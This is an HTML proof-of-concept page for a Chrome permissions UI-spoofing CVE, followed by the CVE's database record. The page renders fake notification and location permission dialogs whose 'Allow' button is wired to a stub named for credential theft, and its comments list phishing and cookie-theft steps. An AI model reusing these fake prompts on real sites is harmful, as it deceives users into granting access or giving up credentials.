CVE-2025-12906

<!-- CVE-2025-12906 UI Spoofing PoC Description: Google Chrome Permissions Inappropriate Implementation UI Spoofing Severity: Low (CVSS 5.4) Note: This is for educational and security testing purposes only --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>CVE-2025-12906 UI Spoofing Demo</title> <style> body { font-family: Arial, sans-serif; padding: 20px; background: #f5f5f5; } .fake-permission-dialog { position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); background: white; border: 1px solid #ccc; border-radius: 8px; box-shadow: 0 4px 16px rgba(0,0,0,0.2); padding: 24px; width: 380px; font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; z-index: 999999; } .fake-permission-dialog::before { content: ''; position: fixed; top: 0; left: 0; right: 0; bottom: 0; background: rgba(0,0,0,0.5); z-index: -1; } .dialog-header { display: flex; align-items: center; margin-bottom: 16px; padding-bottom: 12px; border-bottom: 1px solid #eee; } .dialog-icon { width: 48px; height: 48px; background: #4285f4; border-radius: 50%; margin-right: 16px; display: flex; align-items: center; justify-content: center; color: white; font-size: 24px; } .dialog-title { font-size: 16px; font-weight: 600; color: #333; } .dialog-message { font-size: 14px; color: #666; margin-bottom: 20px; line-height: 1.5; } .dialog-buttons { display: flex; justify-content: flex-end; gap: 12px; } .dialog-btn { padding: 10px 24px; border: none; border-radius: 4px; font-size: 14px; cursor: pointer; font-weight: 500; } .btn-deny { background: transparent; color: #666; } .btn-allow { background: #4285f4; color: white; } .btn-allow:hover { background: #3367d6; } .legitimate-notice { background: #fff3cd; border: 1px solid #ffc107; border-radius: 4px; padding: 12px; margin-top: 20px; font-size: 12px; color: #856404; } </style> </head> <body> <h1>CVE-2025-12906 UI Spoofing Vulnerability PoC</h1> <p>This page demonstrates a UI spoofing attack that exploits the Permissions implementation flaw in Google Chrome versions prior to 140.0.7339.80.</p> <div class="fake-permission-dialog"> <div class="dialog-header"> <div class="dialog-icon">🔔</div> <div class="dialog-title">Notification Permission Request</div> </div> <div class="dialog-message"> <strong>example.com</strong> wants to show notifications.<br><br> Granting this permission will allow the site to send you notifications directly to your desktop. </div> <div class="dialog-buttons"> <button class="dialog-btn btn-deny" onclick="this.parentElement.parentElement.remove()">Block</button> <button class="dialog-btn btn-allow" onclick="stealCredentials()">Allow</button> </div> </div> <div class="legitimate-notice"> <strong>⚠️ Security Notice:</strong><br> The dialog above is a FAKE permission prompt created by the attacker's page.<br> In vulnerable versions, users may mistake this for a legitimate Chrome dialog.<br> The "Allow" button here is designed to trigger malicious actions (demonstration only). </div> <script> // This function simulates what a malicious actor might do function stealCredentials() { console.log('[PoC] User clicked Allow - simulating credential theft'); // In a real attack, this might: // 1. Prompt for login credentials // 2. Redirect to a phishing page // 3. Steal session cookies // 4. Download malicious files alert('In a real attack, malicious actions would be executed here.'); document.querySelector('.fake-permission-dialog').remove(); } // Additional attack vectors function createFakeLocationPrompt() { const fakeDialog = document.createElement('div'); fakeDialog.className = 'fake-permission-dialog'; fakeDialog.innerHTML = ` <div class="dialog-header"> <div class="dialog-icon">📍</div> <div class="dialog-title">Location Permission Request</div> </div> <div class="dialog-message"> <strong>malicious-site.com</strong> wants to access your location.<br><br> This will reveal your precise geographical position. </div> <div class="dialog-buttons"> <button class="dialog-btn btn-deny">Block</button> <button class="dialog-btn btn-allow">Allow</button> </div> `; document.body.appendChild(fakeDialog); } console.log('CVE-2025-12906 PoC loaded'); console.log('Affected versions: Google Chrome < 140.0.7339.80'); </script> </body> </html>

{"cve": {"id": "CVE-2025-12906", "sourceIdentifier": "[email protected]", "published": "2025-11-08T00:15:35.340", "lastModified": "2025-11-21T21:21:10.330", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inappropriate implementation in Permissions in Google Chrome prior to 140.0.7339.80 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "140.0.7339.80", "matchCriteriaId": "614C3A2A-11F8-45CE-BEF0-9033AD4AE057"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2025/09/stable-channel-update-for-desktop.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/428455319", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}